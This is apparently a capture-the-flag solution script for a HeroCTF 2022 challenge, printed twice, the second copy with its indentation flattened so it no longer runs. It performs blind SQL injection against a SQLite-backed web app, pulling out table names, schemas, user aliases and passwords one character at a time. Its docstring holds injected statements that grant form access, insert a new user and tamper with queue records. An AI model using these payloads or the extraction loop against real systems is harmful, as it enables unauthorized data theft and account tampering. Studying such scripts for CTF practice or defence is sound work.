xl00t/HerVIP1.py

## HerVIP1.py
#!/usr/bin/env python3
import requests
import string
import time
import sys
import random
import string
'''
table :
    - users :
        - CREATE TABLE users(alias varchar(100) primary key, password varchar(1000), canAccessForm int DEFAULT 0)
    - queue :
        - CREATE TABLE queue(uuid varchar(200) primary key, origin varchar(1000), associateUser varchar(100), lastUpdate DATE, p3rc3nt4g30fus3r varchar(1000), numberOfRequest varchar(1000))

'; UPDATE users SET canAccessForm = 1 WHERE alias = "aa"--


'; UPDATE queue SET p3rc3nt4g30fus3r="100", numberOfRequest="100"--
'; INSERT INTO users (alias, password, canAccessForm) VALUES ("bb", "lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY=", 1)--

'; INSERT INTO queue (uuid, origin, associateUser, lastUpdate, p3rc3nt4g30fus3r, numberOfRequest) VALUES ("2f1395a1-b89b-4d48-93a8-a4e18ac48471", "chall.heroctf.fr", "aa", DATETIME('now'), "1000", "1000")--

3f1395a1-b89b-4d48-93a8-a4e18ac48471 chall.heroctf.fr aa Sun May 29 2022 09:20:24 GMT+0000 (Coordinated Universal Time) 01 0##
aa lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY= 0

update/1', p3rc3nt4g30fus3r='1000'--

'''

charset = ' '+string.printable
url = "http://localhost:8081/?id=update/"

def trychar(char, offset):
    #requests.get(f"{url}foo' or SUBSTR((SELECT 'ceciestunflagimaginaire'),{offset},1)='{char}'---") # POC
    #requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),{offset},1)='{char}'--")# tables
    #requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='queue'),{offset},1)='{char}'--")# columns
    #requests.get(f"{url}foo' or SUBSTRING((SELECT alias ||' '|| canAccessForm ||' '|| password FROM users limit 1 offset 1),{offset},1)='{char}'--")
    requests.get(f"{url}aaa' or SUBSTRING((SELECT  associateUser ||' '||  p3rc3nt4g30fus3r ||' '|| numberOfRequest ||' '|| lastUpdate FROM queue limit 1 offset 0),{offset},1)='{char}'--")


    r = requests.get(f"{url}111").text
    if '"numberOfRequest":"0"' in r:
        return 0
    return 1

def main():
    offset = 1
    password = ""
    while True:
        found = False
        for c in charset:
            if trychar(c, offset)==1:
                password += c
                print(password)
                offset += 1
                found = True
                break

        if found == False:
            break
    print()

if __name__ == '__main__':
    main()
	#!/usr/bin/env python3
	import requests
	import string
	import time
	import sys
	import random
	import string
	'''
	table :
	- users :
	- CREATE TABLE users(alias varchar(100) primary key, password varchar(1000), canAccessForm int DEFAULT 0)
	- queue :
	- CREATE TABLE queue(uuid varchar(200) primary key, origin varchar(1000), associateUser varchar(100), lastUpdate DATE, p3rc3nt4g30fus3r varchar(1000), numberOfRequest varchar(1000))

	'; UPDATE users SET canAccessForm = 1 WHERE alias = "aa"--


	'; UPDATE queue SET p3rc3nt4g30fus3r="100", numberOfRequest="100"--
	'; INSERT INTO users (alias, password, canAccessForm) VALUES ("bb", "lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY=", 1)--

	'; INSERT INTO queue (uuid, origin, associateUser, lastUpdate, p3rc3nt4g30fus3r, numberOfRequest) VALUES ("2f1395a1-b89b-4d48-93a8-a4e18ac48471", "chall.heroctf.fr", "aa", DATETIME('now'), "1000", "1000")--

	3f1395a1-b89b-4d48-93a8-a4e18ac48471 chall.heroctf.fr aa Sun May 29 2022 09:20:24 GMT+0000 (Coordinated Universal Time) 01 0##
	aa lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY= 0

	update/1', p3rc3nt4g30fus3r='1000'--

	'''

	charset = ' '+string.printable
	url = "http://localhost:8081/?id=update/"

	def trychar(char, offset):
	#requests.get(f"{url}foo' or SUBSTR((SELECT 'ceciestunflagimaginaire'),{offset},1)='{char}'---") # POC
	#requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),{offset},1)='{char}'--")# tables
	#requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='queue'),{offset},1)='{char}'--")# columns
	#requests.get(f"{url}foo' or SUBSTRING((SELECT alias \|\|' '\|\| canAccessForm \|\|' '\|\| password FROM users limit 1 offset 1),{offset},1)='{char}'--")
	requests.get(f"{url}aaa' or SUBSTRING((SELECT associateUser \|\|' '\|\| p3rc3nt4g30fus3r \|\|' '\|\| numberOfRequest \|\|' '\|\| lastUpdate FROM queue limit 1 offset 0),{offset},1)='{char}'--")



	r = requests.get(f"{url}111").text
	if '"numberOfRequest":"0"' in r:
	return 0
	return 1

	def main():
	offset = 1
	password = ""
	while True:
	found = False
	for c in charset:
	if trychar(c, offset)==1:
	password += c
	print(password)
	offset += 1
	found = True
	break

	if found == False:
	break
	print()

	if __name__ == '__main__':
	main()